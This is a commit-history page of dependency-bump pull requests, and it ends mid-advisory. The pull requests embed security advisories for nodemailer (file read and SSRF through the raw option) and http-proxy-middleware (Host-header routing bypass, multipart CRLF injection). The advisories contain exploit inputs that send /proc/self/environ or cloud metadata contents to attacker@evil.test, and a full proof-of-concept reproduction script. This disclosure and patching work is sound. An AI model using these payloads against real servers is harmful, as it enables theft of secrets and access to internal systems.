Compare commits

12 Commits

Author SHA1 Message Date
renovate[bot] e343802b2d chore: bump up Apollo GraphQL packages 2026-06-19 15:00:15 +00:00
renovate[bot] 7ea8800c99 chore: bump up nodemailer version to v9 [SECURITY] (#15134)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [nodemailer](https://nodemailer.com/) ([source](https://redirect.github.com/nodemailer/nodemailer)) | [`^8.0.11` → `^9.0.0`](https://renovatebot.com/diffs/npm/nodemailer/8.0.11/9.0.1) | ![age](https://developer.mend.io/api/mc/badges/age/npm/nodemailer/9.0.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/nodemailer/8.0.11/9.0.1?slim=true) |

---

### Nodemailer: Message-level raw option bypasses
disableFileAccess/disableUrlAccess, enabling arbitrary file read and
full-response SSRF in the delivered message

[GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f)

<details>
<summary>More information</summary>

#### Details
##### Message-level `raw` option bypasses `disableFileAccess` /
`disableUrlAccess`, enabling arbitrary file read and full-response SSRF
in the sent message

- **Target:** nodemailer/nodemailer, npm `nodemailer` **v9.0.0** (HEAD
`4e58450eb490e5097a74b2b2cce35a8d9e21856e`)
- **Verdict:** CONFIRMED (local PoC, no network)

##### Summary

Nodemailer exposes `disableFileAccess` and `disableUrlAccess` so an
application that passes
**untrusted** message data to the library can forbid that data from
reading local files or
fetching URLs. Every attachment, alternative,
`html`/`text`/`watchHtml`/`amp` and `icalEvent`
content node honors these flags. **The message-level `raw` option does
not.**

`MailComposer.compile()` builds the root MIME node for a `raw` message
**without** threading the
two flags, so a `raw: { path: '/etc/passwd' }` or `raw: { href:
'http://169.254.169.254/…' }`
message is read / fetched anyway, and the file or HTTP-response bytes
become the **actual
message that is sent** by every transport (SMTP, SES, sendmail, stream,
JSON). An actor whose
input the application intended to sandbox therefore obtains arbitrary
local-file disclosure and
a full-response SSRF primitive, delivered to a recipient the same actor
can choose.

This is the same vulnerability class as the already-published
jsonTransport advisory
**GHSA-wqvq-jvpq-h66f**, but a **distinct code path** (`raw` root node,
not `normalize()`), and
strictly higher impact: the jsonTransport bug only affected the
locally-returned JSON, whereas
this affects the delivered RFC822 message for all transports.

##### Affected component

- `lib/mail-composer/index.js:34-35` — root cause:
  ```js
  if (this.mail.raw) {
      this.message = new MimeNode('message/rfc822', { newline: this.mail.newline }).setRaw(this.mail.raw);
  }
  ```
  The `MimeNode` is constructed with only `{ newline }`. Compare the
  sibling node builders
  `_createMixed`/`_createAlternative`/`_createRelated`/`_createContentNode`
  (`lib/mail-composer/index.js:389-527`), which all pass
  `disableUrlAccess: this.mail.disableUrlAccess, disableFileAccess: this.mail.disableFileAccess`.
- `lib/mime-node/index.js:51-52` — the constructor derives
`this.disableFileAccess`/
`this.disableUrlAccess` solely from its own `options`; children do
**not** inherit a parent's
flags (`createChild`/`appendChild`, lines 175-194, pass options through
verbatim).
- `lib/mime-node/index.js:812` — `setRaw()` content is resolved through
`this._getStream(this._raw)`.
- `lib/mime-node/index.js:984-1010` — `_getStream` reads the file
(`fs.createReadStream`, 995) or
fetches the URL (`nmfetch`, 1009) **only guarded by
`this.disableFileAccess`/`this.disableUrlAccess`**,
  which on the `raw` root node are `false`.
- Reached from the normal send flow at `lib/mailer/index.js:188`
(`mail.message = new MailComposer(mail.data).compile()`), so every
transport is affected.

##### Reachability gate (hop-by-hop)

1. **Source.** Application calls `transporter.sendMail({ raw:
<userControlled> , to: <userControlled> })`
with `disableFileAccess: true` and/or `disableUrlAccess: true`
configured on the transporter
(forced onto `mail.data` in `lib/mailer/mail-message.js:36-40`) or per
message. This is the
exact scenario the flags exist for — the same precondition under which
GHSA-wqvq-jvpq-h66f was
   accepted.
2. **Guard — the access flags.** For attachments the flag is enforced: a
node created by
`_createContentNode` carries `disableFileAccess`, so `_getStream` throws
`EFILEACCESS`.
**Bypass:** the `raw` branch (`compile():34-35`) never sets the flag on
its node, so
`this.disableFileAccess === false` and the guard at `mime-node:985` /
`:999` is skipped.
There is no other validation between `mail.raw` and the read; `raw`
content shapes
(`{path}`, `{href}`, stream, string, buffer) are accepted as-is by
`setRaw`/`_getStream`.
3. **Sink.** `fs.createReadStream(content.path)` (file disclosure) or
`nmfetch(content.href, …)` (SSRF). The resulting bytes are emitted as
the message body by
   `createReadStream()`, which every transport pipes to its destination
(`smtp-transport:233`, `smtp-pool/pool-resource:208`,
`ses-transport:96`, `sendmail-transport:184`,
   `stream-transport:67`).

No guard blocks the chain; the only guard (the access flags) is
structurally absent on this node.

##### Root cause

Inconsistent enforcement: the access policy is applied per-`MimeNode`
via constructor options and
must be re-passed at every node creation. The `raw`-message shortcut in
`compile()` omits it,
while all five other node builders include it. The flags are therefore
enforced for every content
type *except* the one that lets the caller supply a complete message
body by path/URL.
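
The root cause can be illustrated with a small model. This is a sketch only: `SketchNode`, `buildContentNode`, and `buildRawNodeUnpatched` are hypothetical stand-ins written for this illustration, not Nodemailer's classes, and the sketch assumes nothing beyond what the advisory describes (flags are read from each node's own options and are never inherited).

```javascript
// Simplified model of per-node access flags. NOT Nodemailer's code:
// SketchNode and both builder functions are hypothetical stand-ins.
class SketchNode {
    constructor(options = {}) {
        // Flags come only from this node's own options; nothing is inherited.
        this.disableFileAccess = !!options.disableFileAccess;
        this.disableUrlAccess = !!options.disableUrlAccess;
    }

    // Decide whether this node may resolve a content descriptor.
    resolve(content) {
        if (content.path && this.disableFileAccess) {
            const err = new Error('File access rejected for ' + content.path);
            err.code = 'EFILEACCESS';
            throw err;
        }
        if (content.href && this.disableUrlAccess) {
            const err = new Error('Url access rejected for ' + content.href);
            err.code = 'EURLACCESS';
            throw err;
        }
        return 'would read: ' + (content.path || content.href);
    }
}

const mail = { disableFileAccess: true, disableUrlAccess: true, newline: '\n' };

// Attachment-style builder: threads the flags, so the guard fires.
function buildContentNode(mailData) {
    return new SketchNode({
        disableFileAccess: mailData.disableFileAccess,
        disableUrlAccess: mailData.disableUrlAccess
    });
}

// Raw-style builder as described for the unpatched code: only `newline` is passed.
function buildRawNodeUnpatched(mailData) {
    return new SketchNode({ newline: mailData.newline });
}

// Return the resolved description, or the error code if the guard fired.
function tryResolve(node, content) {
    try {
        return node.resolve(content);
    } catch (err) {
        return err.code;
    }
}

const attachmentResult = tryResolve(buildContentNode(mail), { path: '/etc/passwd' });
const rawResult = tryResolve(buildRawNodeUnpatched(mail), { path: '/etc/passwd' });
console.log(attachmentResult); // EFILEACCESS
console.log(rawResult);        // would read: /etc/passwd
```

The same descriptor is blocked or allowed depending only on which builder created the node, which is the asymmetry the advisory reports.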

##### Exploit path

Application that sandboxes untrusted mail input
(`disableFileAccess`/`disableUrlAccess` set):

1. Untrusted actor supplies `raw: { path: '/proc/self/environ' }` (or
any server file:
   `/app/.env`, key material, etc.) and `to: attacker@evil.test`.
2. `compile()` builds the raw root node without the flags; the transport
reads the file and sends
its contents as the message → **arbitrary server-file exfiltration to an
attacker-chosen mailbox.**
3. Alternatively `raw: { href: 'http://127.0.0.1:8080/admin' }` or a
cloud metadata URL →
Nodemailer fetches it server-side and delivers the full response body in
the email →
   **full-response SSRF** (no blind-channel limitation).

##### Impact

- **Confidentiality (High):** arbitrary local file read disclosed in the
outgoing message;
full-response SSRF to internal/metadata endpoints, also disclosed in the
message.
- **Integrity (Low):** attacker-fetched/file content is injected into
the delivered mail.
- The two protective flags an application relies on to contain untrusted
input are silently
  ineffective for `raw`.

##### Preconditions

The application (a) passes `disableFileAccess` and/or `disableUrlAccess`
(the documented sandboxing
flags) and (b) lets untrusted input influence the `raw` field (and, for
maximal disclosure, `to`).
No other configuration is required; all bundled transports are affected.
This mirrors the accepted
precondition of GHSA-wqvq-jvpq-h66f.

##### Severity

- **AV** — message data routinely originates over the network in the
apps these flags protect.
- **AC** — a single crafted `raw` object; deterministic.
- **PR** — the actor is a user whose input the app already treats as
untrusted (the reason the
  flags are set); not fully anonymous in the typical deployment.
- **UI** — no victim interaction.
- **S** — impact within Nodemailer's process scope.
- **C** — arbitrary file read **and** full-response SSRF, both delivered
to an attacker-chosen
recipient. (The sibling jsonTransport advisory used C:L because its leak
stayed in locally-returned
JSON; here the bytes leave the system in the sent message, so C:H is
warranted.)
- **I** — attacker injects fetched/file bytes into the outgoing message.
- **A**: no availability impact (`A:N`).

Note: if a deployment fixes the recipient (`to` not attacker-controlled)
the disclosure channel
narrows and the rating degrades toward the sibling's Medium; the High
rating reflects the
reasonable worst case where `raw` and `to` are both untrusted.

##### Adversarial re-read (attempts to refute)

1. **"`raw` content is by-design trusted, so the flags shouldn't
apply."** Rejected: every other
content path (attachments, alternatives, html/text, icalEvent) honors
the flags, and the
maintainer already accepted GHSA-wqvq-jvpq-h66f for exactly this
"untrusted input + flag set"
model. The asymmetry — attachment `{path}` is blocked but `raw:{path}`
is not — is the bug, and
the PoC's CONTROL case proves the flag is otherwise effective on the
same file.
2. **"The raw node inherits the flags via rootNode."** Rejected by code
and by PoC: `compile():35`
constructs the node with `{ newline }` only; `MimeNode` constructor sets
`this.disableFileAccess = !!options.disableFileAccess` → `false`;
`rootNode` is itself; no
   inheritance exists.
3. **"The PoC leaks for an unrelated reason."** Rejected: the CONTROL
message (`attachments:[{path}]`,
same file, same transporter) returns `EFILEACCESS`; only the
`raw:{path}` message leaks. The
sentinel nonce exists solely in the temp file; the URL nonce is
generated server-side and is only
obtainable by an actual fetch. Both observables are uniquely bound to
the bypass.
4. **"Maybe only jsonTransport (already reported) is affected."**
Rejected: the PoC uses
`streamTransport` and the root cause is in `MailComposer.compile()`
(`mailer:188`), shared by all
   transports; jsonTransport is a different (already-fixed) path.

I could not find any guard that blocks the chain; the finding survives.

##### Proof of concept (safe, benign)

`findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` — local, no
network egress (loopback only),
no destructive action. Output:
```
[CONTROL] attachment path with disableFileAccess: BLOCKED (EFILEACCESS) — flag works here
[ATTACK]  raw:{path} with disableFileAccess=true: BYPASSED — sentinel file CONTENT present in message
[ATTACK]  raw:{href} with disableUrlAccess=true (loopback server): BYPASSED — fetched body present (SSRF)
VERDICT: CONFIRMED
```
Run: `node findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` (exit 0
= confirmed).

##### Remediation

Thread the access policy onto the `raw` root node, exactly as the other
builders do:
```js
if (this.mail.raw) {
    this.message = new MimeNode('message/rfc822', {
        newline: this.mail.newline,
        disableFileAccess: this.mail.disableFileAccess,
        disableUrlAccess: this.mail.disableUrlAccess
    }).setRaw(this.mail.raw);
}
```
(Defense in depth: `setRaw`/`_getStream` could also refuse
`{path}`/`{href}` raw content when either
flag is set, regardless of how the node was constructed.) Add a
regression test asserting that
`raw:{path}` and `raw:{href}` reject with `EFILEACCESS`/`EURLACCESS`
when the flags are set, mirroring
the attachment tests.
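
Until the upgrade is deployed, an application could also refuse path- or URL-shaped `raw` values itself before they reach `sendMail`. The sketch below is an assumption-laden illustration: `assertInlineRaw` and the `ERAWREJECTED` code are hypothetical names, not part of Nodemailer, and the check is deliberately strict (it also rejects streams and other object forms that Nodemailer would normally accept).

```javascript
// Hypothetical application-side guard; not part of Nodemailer.
// Accepts only inline raw content (string or Buffer) from untrusted input.
function assertInlineRaw(raw) {
    if (typeof raw === 'string' || Buffer.isBuffer(raw)) {
        return raw;
    }
    const err = new Error('raw must be an inline string or Buffer when it comes from untrusted input');
    err.code = 'ERAWREJECTED'; // hypothetical error code
    throw err;
}

// Small helper for demonstration: report 'ok' or the rejection code.
function checkRaw(raw) {
    try {
        assertInlineRaw(raw);
        return 'ok';
    } catch (err) {
        return err.code;
    }
}

console.log(checkRaw('Subject: hi\r\n\r\nbody'));             // ok
console.log(checkRaw({ path: '/proc/self/environ' }));        // ERAWREJECTED
console.log(checkRaw({ href: 'http://169.254.169.254/' }));   // ERAWREJECTED
```

A guard like this complements the library fix rather than replacing it; upgrading to the patched release remains the actual remediation.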

#### Severity
- CVSS Score: 7.1 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N`
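
For readers who want to check the arithmetic, the sketch below recomputes the base score from the vector string using the metric weights and formulas of the public CVSS v3.1 specification. It is a minimal illustration, not an official calculator: the function names are made up for this example, and it handles only Scope Unchanged (`S:U`) vectors such as the one above.

```javascript
// CVSS v3.1 base-score arithmetic for Scope Unchanged vectors only.
// Weights are the numeric metric values from the CVSS v3.1 specification.
const WEIGHTS = {
    AV: { N: 0.85, A: 0.62, L: 0.55, P: 0.2 },
    AC: { L: 0.77, H: 0.44 },
    PR: { N: 0.85, L: 0.62, H: 0.27 }, // values for Scope Unchanged
    UI: { N: 0.85, R: 0.62 },
    CIA: { H: 0.56, L: 0.22, N: 0 }
};

// Round up to one decimal place, using the integer approach from the specification.
function roundUp(x) {
    const i = Math.round(x * 100000);
    return i % 10000 === 0 ? i / 100000 : (Math.floor(i / 10000) + 1) / 10;
}

function cvss31BaseScoreUnchanged(vector) {
    // Turn "CVSS:3.1/AV:N/AC:L/..." into { AV: 'N', AC: 'L', ... }.
    const m = Object.fromEntries(vector.split('/').slice(1).map((part) => part.split(':')));
    if (m.S !== 'U') {
        throw new Error('this sketch only supports Scope Unchanged vectors');
    }
    const iss = 1 - (1 - WEIGHTS.CIA[m.C]) * (1 - WEIGHTS.CIA[m.I]) * (1 - WEIGHTS.CIA[m.A]);
    const impact = 6.42 * iss;
    const exploitability = 8.22 * WEIGHTS.AV[m.AV] * WEIGHTS.AC[m.AC] * WEIGHTS.PR[m.PR] * WEIGHTS.UI[m.UI];
    if (impact <= 0) {
        return 0;
    }
    return roundUp(Math.min(impact + exploitability, 10));
}

const score = cvss31BaseScoreUnchanged('CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N');
console.log(score); // 7.1
```

With these inputs the impact sub-score is about 4.22 and the exploitability sub-score about 2.84, so the sum of roughly 7.05 rounds up to 7.1.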

#### References
-
[https://github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f)
-
[https://github.com/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>nodemailer/nodemailer (nodemailer)</summary>

###
[`v9.0.1`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#901-2026-06-17)

[Compare
Source](https://redirect.github.com/nodemailer/nodemailer/compare/v9.0.0...v9.0.1)

##### Bug Fixes

- enforce disableFileAccess/disableUrlAccess for raw message option
([a82e060](https://redirect.github.com/nodemailer/nodemailer/commit/a82e060d978f27e5f41369a9a9807b1e3dedc2e2))

###
[`v9.0.0`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#900-2026-06-14)

[Compare
Source](https://redirect.github.com/nodemailer/nodemailer/compare/v8.0.11...v9.0.0)

##### ⚠ BREAKING CHANGES

- HTTPS requests made while fetching remote content (attachment
href/path URLs, OAuth2 token endpoints, HTTP/HTTPS proxy CONNECT) now
validate the server's TLS certificate by default. Requests to hosts with
self-signed, expired, or hostname-mismatched certificates that
previously succeeded will now fail. Opt back out per request with
tls.rejectUnauthorized=false (transport options, or a per-attachment
`tls` option).
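
As a rough illustration of the two opt-out locations named above, the fragment below shows plain option objects. The exact shape of the per-attachment `tls` option is an assumption inferred from the wording `tls.rejectUnauthorized=false`; the hosts, addresses, and file names are placeholders.

```javascript
// Transport-level opt-out. Note that for SMTP transports the `tls` options
// also govern the SMTP connection's own TLS handshake, so this is broad.
const transportOptions = {
    host: 'smtp.example.test', // placeholder host
    port: 587,
    tls: { rejectUnauthorized: false }
};

// Per-attachment opt-out (assumed shape): only this one remote fetch
// would skip certificate validation.
const message = {
    from: 'sender@example.test',
    to: 'recipient@example.test',
    subject: 'Report',
    attachments: [
        {
            filename: 'report.pdf',
            href: 'https://internal.example.test/report.pdf', // placeholder URL
            tls: { rejectUnauthorized: false }
        }
    ]
};

console.log(transportOptions.tls.rejectUnauthorized);       // false
console.log(message.attachments[0].tls.rejectUnauthorized); // false
```

Where an opt-out is unavoidable, the per-attachment form keeps the exception as narrow as possible; installing a trusted certificate on the remote host avoids the opt-out altogether.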

##### Bug Fixes

- replace deprecated url.parse with a WHATWG URL wrapper
([0c080fb](https://redirect.github.com/nodemailer/nodemailer/commit/0c080fbf3278926f013a5c2ad06f5f6f0e18f5ed))
- validate TLS certificates by default when fetching remote content
([6a947ac](https://redirect.github.com/nodemailer/nodemailer/commit/6a947ac7114a16da1e6a50d9a6f4e17026ce145d))

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-19 22:51:23 +08:00
renovate[bot] 16196c6ca1 chore: bump up http-proxy-middleware version to v3.0.7 [SECURITY] (#15131)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [http-proxy-middleware](https://redirect.github.com/chimurai/http-proxy-middleware) | [`3.0.5` → `3.0.7`](https://renovatebot.com/diffs/npm/http-proxy-middleware/3.0.5/3.0.7) | ![age](https://developer.mend.io/api/mc/badges/age/npm/http-proxy-middleware/3.0.7?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/http-proxy-middleware/3.0.5/3.0.7?slim=true) |
---

### http-proxy-middleware `router` host+path substring matching allows
Host-header-driven backend routing bypass
[CVE-2026-55602](https://nvd.nist.gov/vuln/detail/CVE-2026-55602) /
[GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj)

<details>
<summary>More information</summary>

#### Details
##### Summary

`http-proxy-middleware` documents `router` proxy-table entries as host,
path, or host+path selectors, but the host+path implementation uses
unanchored substring matching on attacker-controlled request metadata.
As a result, a crafted `Host` header that is only a superstring match
for a configured host+path key can still route a request to an
unintended backend.

##### Details

Tested code state:

- validated on tag `v4.0.0-beta.5`
- corresponding commit: `339f09ede860197807d4fd99ed9020fa5d0bd358`

Relevant code locations:

- `src/router.ts`
- `src/http-proxy-middleware.ts`

Affected public API:

- `createProxyMiddleware({ router: { 'host/path': 'http://target' } })`

Code explanation:

When a proxy-table router key contains `/`, `getTargetFromProxyTable()`
concatenates attacker-controlled `req.headers.host` and `req.url` into a
single `hostAndPath` string, then accepts the route if:

```ts
hostAndPath.indexOf(key) > -1
```

That is a substring test, not an exact host match plus intended path
match. In the validated PoC, the configured router key is:

```txt
localhost:3000/api
```

but the attacker-controlled host is:

```txt
evillocalhost:3000
```

and the request path is:

```txt
/api
```

The concatenated attacker-controlled string:

```txt
evillocalhost:3000/api
```

still contains the configured router key as a substring, so the
middleware selects the alternate backend even though the host is not
equal to the configured host.
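
The difference between the substring test and an anchored comparison can be sketched as follows. `substringMatch` mirrors the check quoted above; `strictMatch` is a hypothetical helper written for this illustration and is not the library's implementation or its fix. It assumes the key contains a `/` and compares hosts case-sensitively for brevity.

```javascript
// The check described above: concatenate host and URL, then test for a substring.
function substringMatch(host, url, key) {
    return (host + url).indexOf(key) > -1;
}

// Hypothetical stricter matcher: exact host, and the path must equal the
// configured path or extend it at a segment boundary.
function strictMatch(host, url, key) {
    const slash = key.indexOf('/');
    if (slash === -1) {
        return false; // this sketch only handles host+path keys
    }
    const keyHost = key.slice(0, slash);
    const keyPath = key.slice(slash);
    if (host !== keyHost) {
        return false;
    }
    const path = url.split('?')[0];
    const prefix = keyPath.endsWith('/') ? keyPath : keyPath + '/';
    return path === keyPath || path.startsWith(prefix);
}

const key = 'localhost:3000/api';
console.log(substringMatch('evillocalhost:3000', '/api', key)); // true
console.log(strictMatch('evillocalhost:3000', '/api', key));    // false
console.log(strictMatch('localhost:3000', '/api/users', key));  // true
console.log(strictMatch('localhost:3000', '/apiv2', key));      // false
```

A production matcher would also need to normalize host case and decide how to treat default ports; those details are left out here.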

Exploit path:

1. the application enables the documented proxy-table `router` feature
with at least one host+path rule
2. an external attacker sends an ordinary HTTP request with a crafted
`Host` header
3. `HttpProxyMiddleware.prepareProxyRequest()` applies router selection
before proxying
4. `getTargetFromProxyTable()` accepts the crafted `Host + path` string
through substring matching
5. the request is proxied to the wrong backend

##### PoC

Create these files in the same working directory and run:

```bash
bash ./run.sh
```

##### File: `run.sh`

```bash
#!/usr/bin/env bash
set -euo pipefail

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
REPO_URL="https://github.com/chimurai/http-proxy-middleware.git"
REPO_REF="v4.0.0-beta.5"
WORKDIR="$(mktemp -d "${SCRIPT_DIR}/.tmp-repro.XXXXXX")"
TARGET_REPO_DIR="${WORKDIR}/repo"
REPRO_DIR="${WORKDIR}/reproduction"
IMAGE_TAG="http-proxy-middleware-router-bypass-poc"

cleanup() {
  rm -rf "${WORKDIR}"
}
trap cleanup EXIT

echo "[a3] cloning target repository"
git clone --quiet "${REPO_URL}" "${TARGET_REPO_DIR}"
git -C "${TARGET_REPO_DIR}" checkout --quiet "${REPO_REF}"

mkdir -p "${REPRO_DIR}"
cp "${SCRIPT_DIR}/Dockerfile" "${WORKDIR}/Dockerfile"
cp "${SCRIPT_DIR}/verify.mjs" "${REPRO_DIR}/verify.mjs"

echo "[a3] building reproduction image"
docker build -f "${WORKDIR}/Dockerfile" -t "${IMAGE_TAG}" "${WORKDIR}"

echo "[a3] running verification"
docker run --rm "${IMAGE_TAG}" node /work/reproduction/verify.mjs
```

##### File: `Dockerfile`

```Dockerfile
FROM node:22-bullseye

WORKDIR /work

COPY repo/package.json repo/yarn.lock /work/repo/

RUN corepack enable \
  && cd /work/repo \
  && yarn install --frozen-lockfile

COPY repo /work/repo
RUN cd /work/repo && yarn build

COPY reproduction /work/reproduction
```

##### File: `verify.mjs`

```js
import http from 'node:http';
import fs from 'node:fs';
import assert from 'node:assert/strict';

import { createProxyMiddleware } from '/work/repo/dist/index.js';

const ROUTER_KEY = 'localhost:3000/api';
const CRAFTED_HOST = 'evillocalhost:3000';

function listen(server, port) {
  return new Promise((resolve) => {
    server.listen(port, '127.0.0.1', () => resolve());
  });
}

function close(server) {
  return new Promise((resolve, reject) => {
    server.close((err) => {
      if (err) {
        reject(err);
        return;
      }
      resolve();
    });
  });
}

function request(path, host) {
  return new Promise((resolve, reject) => {
    const req = http.request(
      {
        host: '127.0.0.1',
        port: 3000,
        path,
        method: 'GET',
        headers: {
          Host: host,
        },
      },
      (res) => {
        let data = '';
        res.setEncoding('utf8');
        res.on('data', (chunk) => {
          data += chunk;
        });
        res.on('end', () => {
          resolve({ statusCode: res.statusCode, body: data });
        });
      },
    );
    req.on('error', reject);
    req.end();
  });
}

const defaultBackend = http.createServer((req, res) => {
  res.end('DEFAULT');
});

const secretBackend = http.createServer((req, res) => {
  res.end('SECRET');
});

const proxyMiddleware = createProxyMiddleware({
  target: 'http://127.0.0.1:3101',
  router: {
    [ROUTER_KEY]: 'http://127.0.0.1:3102',
  },
});

const proxyServer = http.createServer((req, res) => {
  proxyMiddleware(req, res, () => {
    res.statusCode = 404;
    res.end('NO_PROXY');
  });
});

try {
  assert.ok(fs.existsSync('/work/repo/dist/index.js'));
  assert.ok(fs.existsSync('/work/reproduction/verify.mjs'));

  await listen(defaultBackend, 3101);
  await listen(secretBackend, 3102);
  await listen(proxyServer, 3000);
  console.log('STEP start-services ok');

  const baseline = await request('/api', 'safe.example:3000');
  assert.equal(baseline.statusCode, 200);
  assert.equal(baseline.body, 'DEFAULT');
  console.log(`STEP baseline-route body=${baseline.body}`);

  const crafted = await request('/api', CRAFTED_HOST);
  assert.equal(crafted.statusCode, 200);
  assert.equal(crafted.body, 'SECRET');
  assert.notEqual(CRAFTED_HOST, ROUTER_KEY.split('/')[0]);
  console.log(`STEP crafted-route body=${crafted.body}`);

  console.log('RESULT reproduced host_header_injection router substring match bypass');
} finally {
  await Promise.allSettled([close(proxyServer), close(defaultBackend), close(secretBackend)]);
}
```

This PoC starts:

- one default backend returning `DEFAULT`
- one alternate backend returning `SECRET`
- one proxy using:

```js
createProxyMiddleware({
  target: 'http://127.0.0.1:3101',
  router: {
    [ROUTER_KEY]: 'http://127.0.0.1:3102',
  },
});
```

It then sends:

1. a baseline request to `/api` with `Host: safe.example:3000`
2. a crafted request to `/api` with `Host: evillocalhost:3000`

Observed result from the validated PoC:

- baseline request: `STEP baseline-route body=DEFAULT`
- crafted request: `STEP crafted-route body=SECRET`
- success marker: `RESULT reproduced host_header_injection router
substring match bypass`

The PoC is considered successful only if:

1. the baseline request stays on the default backend
2. the crafted request reaches the alternate backend
3. the crafted host is not equal to the configured router host

##### Impact

This is a backend-selection integrity issue in a documented library
feature. Applications that use host+path router-table rules for backend
segmentation, tenant routing, or separation of public and more sensitive
upstreams can have that routing boundary bypassed by an unauthenticated
external client using an ordinary crafted `Host` header.

#### Severity
- CVSS Score: 6.9 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N`

#### References
-
[https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj)
-
[https://github.com/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### http-proxy-middleware: multipart/form-data field injection via
unescaped CRLF in `fixRequestBody`
[CVE-2026-55603](https://nvd.nist.gov/vuln/detail/CVE-2026-55603) /
[GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm)

<details>
<summary>More information</summary>

#### Details
##### Summary
`fixRequestBody()` is the library's documented helper for re-emitting a
request body that was already consumed by a body parser. When the
**outgoing** `Content-Type` is `multipart/form-data`, it rebuilds the
body with `handlerFormDataBodyData()`, which interpolates each
`req.body` key and value directly into the multipart wire format
**without neutralizing CR/LF**:

```js
// dist/handlers/fix-request-body.js
function handlerFormDataBodyData(contentType, data) {
  const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1');
  let str = '';
  for (const [key, value] of Object.entries(data)) {
    str += `--${boundary}\r\nContent-Disposition: form-data; name="${key}"\r\n\r\n${value}\r\n`;
  }
  return str;
}
```

A `\r\n` inside a value (or key) lets an attacker close the current part
and inject an **entirely new form part**. Because the proxy's own body
parser saw a single opaque value, any gateway-side policy or validation
performed on `req.body` is evaluated against a different set of fields
than the upstream backend ultimately parses: a request/parameter
desynchronization across the trust boundary.

By contrast, the sibling output branches are safe: `application/json`
uses `JSON.stringify` (escapes control chars) and
`application/x-www-form-urlencoded` uses `querystring.stringify`
(percent-encodes). Only the multipart branch lacks escaping.
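
The contrast between the three output encodings can be seen in a few lines. This is a sketch under stated assumptions: `URLSearchParams` stands in for `querystring.stringify` (both percent-encode CR and LF), and the multipart line reproduces the interpolation pattern from the excerpt rather than calling the library.

```javascript
const value = 'alice\r\n--BB\r\nContent-Disposition: form-data; name="role"\r\n\r\nadmin';

// JSON branch: control characters are escaped inside the string literal.
const asJson = JSON.stringify({ user: value });

// URL-encoded branch: CR and LF become %0D and %0A.
const asForm = new URLSearchParams({ user: value }).toString();

// Multipart-style interpolation: the CR/LF bytes pass through unchanged.
const asMultipart = `--BB\r\nContent-Disposition: form-data; name="user"\r\n\r\n${value}\r\n`;

// Count how many fields a receiver would see in each encoding.
const jsonFields = Object.keys(JSON.parse(asJson)).length;
const formFields = [...new URLSearchParams(asForm).keys()].length;
const multipartParts = asMultipart.split('--BB\r\n').length - 1;

console.log(jsonFields);     // 1
console.log(formFields);     // 1
console.log(multipartParts); // 2
```

The JSON and URL-encoded forms round-trip to a single `user` field, while the interpolated multipart text now contains two part delimiters.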

##### Preconditions
All three must hold; this narrows real-world exposure and is the basis
for `AC:H`:
1. The proxy app populates `req.body` with a **non-multipart** parser
(`express.urlencoded`, `express.json`, or text) so an injected boundary
in a value is **not** split on input.
2. The proxied (outgoing) request is sent as **`multipart/form-data`**
(e.g. an adaptation layer, or any flow that sets the upstream
content-type to multipart), so the vulnerable branch runs.
3. The app calls `fixRequestBody` (the documented pattern for "I
body-parsed, now re-stream"), and an attacker controls at least one body
field value or key.

> Note: a pure multipart-in → multipart-out flow (e.g. `multer`) is
generally **not** exploitable for a *new-field* injection, because the
proxy's multipart parser already splits the injected boundary, so
`req.body` and the backend agree. The desync specifically requires a
non-multipart input parser.

##### Impact
When the preconditions hold, an attacker injects/overrides multipart
fields seen only by the backend:
- **Validation / access-control bypass:** bypass gateway-side field
